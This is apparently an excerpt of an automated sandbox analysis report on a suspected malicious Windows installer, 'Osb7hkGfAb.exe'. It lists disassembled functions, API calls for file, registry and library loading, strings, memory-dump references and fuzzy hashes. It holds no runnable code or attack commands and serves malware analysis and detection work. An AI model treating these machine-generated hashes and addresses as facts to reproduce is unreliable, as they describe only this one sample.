                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID: Calibri
                                                                  • API String ID: 3808545654-1409258342
                                                                  • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                  • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                  • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                  • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                                  Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 549 4056e4-40572f CreateDirectoryA 550 405731-405733 549->550 551 405735-405742 GetLastError 549->551 552 40575c-40575e 550->552 551->552 553 405744-405758 SetFileSecurityA 551->553 553->550 554 40575a GetLastError 553->554 554->552
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                  • GetLastError.KERNEL32 ref: 0040573B
                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                  • GetLastError.KERNEL32 ref: 0040575A
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                  • C:\Users\user\Desktop, xrefs: 004056E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-1729097607
                                                                  • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                  • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                  • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                  • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                                  Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 555 406492-4064b2 GetSystemDirectoryA 556 4064b4 555->556 557 4064b6-4064b8 555->557 556->557 558 4064c8-4064ca 557->558 559 4064ba-4064c2 557->559 561 4064cb-4064fd wsprintfA LoadLibraryExA 558->561 559->558 560 4064c4-4064c6 559->560 560->561
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                  • wsprintfA.USER32 ref: 004064E2
                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-4240819195
                                                                  • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                  • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                  • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                  • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                                  Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 562 405cbf-405cc9 563 405cca-405cf5 GetTickCount GetTempFileNameA 562->563 564 405d04-405d06 563->564 565 405cf7-405cf9 563->565 567 405cfe-405d01 564->567 565->563 566 405cfb 565->566 566->567
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405CD3
                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 00405CBF
                                                                  • nsa, xrefs: 00405CCA
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-4223113140
                                                                  • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                  • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                  • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                  • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                                  Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 568 402cd0-402cf9 call 405f7d 570 402cfe-402d02 568->570 571 402db3-402db7 570->571 572 402d08-402d0c 570->572 573 402d31-402d44 572->573 574 402d0e-402d2f RegEnumValueA 572->574 576 402d6d-402d74 RegEnumKeyA 573->576 574->573 575 402d98-402da6 RegCloseKey 574->575 575->571 577 402d46-402d48 576->577 578 402d76-402d88 RegCloseKey call 406500 576->578 577->575 580 402d4a-402d5e call 402cd0 577->580 583 402da8-402dae 578->583 584 402d8a-402d96 RegDeleteKeyA 578->584 580->578 586 402d60-402d6c 580->586 583->571 584->571 586->576
                                                                  APIs
                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnum$DeleteValue
                                                                  • String ID:
                                                                  • API String ID: 1354259210-0
                                                                  • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                  • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                  • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                  • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                  Function 6FF816DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 587 6ff816db-6ff81717 call 6ff81a98 591 6ff8171d-6ff81721 587->591 592 6ff81834-6ff81836 587->592 593 6ff8172a-6ff81737 call 6ff822f1 591->593 594 6ff81723-6ff81729 call 6ff822af 591->594 599 6ff81739-6ff8173e 593->599 600 6ff81767-6ff8176e 593->600 594->593 601 6ff81759-6ff8175c 599->601 602 6ff81740-6ff81741 599->602 603 6ff8178e-6ff81792 600->603 604 6ff81770-6ff8178c call 6ff824d8 call 6ff81559 call 6ff81266 GlobalFree 600->604 601->600 610 6ff8175e-6ff8175f call 6ff82cc3 601->610 606 6ff81749-6ff8174a call 6ff82a38 602->606 607 6ff81743-6ff81744 602->607 608 6ff817dc-6ff817e2 call 6ff824d8 603->608 609 6ff81794-6ff817da call 6ff8156b call 6ff824d8 603->609 628 6ff817e3-6ff817e7 604->628 619 6ff8174f 606->619 612 6ff81751-6ff81757 call 6ff826b2 607->612 613 6ff81746-6ff81747 607->613 608->628 609->628 622 6ff81764 610->622 627 6ff81766 612->627 613->600 613->606 619->622 622->627 627->600 629 6ff817e9-6ff817f7 call 6ff8249e 628->629 630 6ff81824-6ff8182b 628->630 637 6ff817f9-6ff817fc 629->637 638 6ff8180f-6ff81816 629->638 630->592 635 6ff8182d-6ff8182e GlobalFree 630->635 635->592 637->638 639 6ff817fe-6ff81806 637->639 638->630 640 6ff81818-6ff81823 call 6ff814e2 638->640 639->638 641 6ff81808-6ff81809 FreeLibrary 639->641 640->630 641->638
                                                                  APIs
                                                                    • Part of subcall function 6FF81A98: GlobalFree.KERNEL32(?), ref: 6FF81D09
                                                                    • Part of subcall function 6FF81A98: GlobalFree.KERNEL32(?), ref: 6FF81D0E
                                                                    • Part of subcall function 6FF81A98: GlobalFree.KERNEL32(?), ref: 6FF81D13
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF81786
                                                                  • FreeLibrary.KERNEL32(?), ref: 6FF81809
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF8182E
                                                                    • Part of subcall function 6FF822AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF822E0
                                                                    • Part of subcall function 6FF826B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FF81757,00000000), ref: 6FF82782
                                                                    • Part of subcall function 6FF8156B: wsprintfA.USER32 ref: 6FF81599
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                  • String ID:
                                                                  • API String ID: 3962662361-3916222277
                                                                  • Opcode ID: 7b0e2e88a262d2caaa60d226e14de37947ca441dc8ca9bf545867455d961c710
                                                                  • Instruction ID: 815599456ed116f2de733a800327ab2974269f6ea0362037ac4975f37415ab3c
                                                                  • Opcode Fuzzy Hash: 7b0e2e88a262d2caaa60d226e14de37947ca441dc8ca9bf545867455d961c710
                                                                  • Instruction Fuzzy Hash: 34417EB11003089BDF009F749DC5BEA37BCBF06328F04866AE9359E2D6DB75A045CBA0
                                                                  Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 644 401c2e-401c4e call 402bac * 2 649 401c50-401c57 call 402bce 644->649 650 401c5a-401c5e 644->650 649->650 652 401c60-401c67 call 402bce 650->652 653 401c6a-401c70 650->653 652->653 656 401c72-401c8e call 402bac * 2 653->656 657 401cbe-401ce4 call 402bce * 2 FindWindowExA 653->657 668 401c90-401cac SendMessageTimeoutA 656->668 669 401cae-401cbc SendMessageA 656->669 667 401cea 657->667 670 401ced-401cf0 667->670 668->670 669->667 671 401cf6 670->671 672 402a5a-402a69 670->672 671->672
                                                                  APIs
                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                  • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                  • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                  • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                  Function 00402476 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 675 402476-4024a7 call 402bce * 2 call 402c5e 682 402a5a-402a69 675->682 683 4024ad-4024b7 675->683 684 4024c7-4024ca 683->684 685 4024b9-4024c6 call 402bce lstrlenA 683->685 688 4024e1-4024e4 684->688 689 4024cc-4024e0 call 402bac 684->689 685->684 693 4024f5-402509 RegSetValueExA 688->693 694 4024e6-4024f0 call 4030d8 688->694 689->688 697 40250b 693->697 698 40250e-4025eb RegCloseKey 693->698 694->693 697->698 698->682
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000023,00000011,00000002), ref: 004024C1
                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 00402501
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nswE071.tmp
                                                                  • API String ID: 2655323295-1835146548
                                                                  • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                  • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                                  • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                  • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                                  Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2987980305-0
                                                                  • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                  • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                  • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                  • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                  Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                    • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                                  Strings
                                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                  • API String ID: 1892508949-3491094995
                                                                  • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                  • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                  • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                  • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                  Function 00405FDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                                  • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: Call
                                                                  • API String ID: 3356406503-1824292864
                                                                  • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
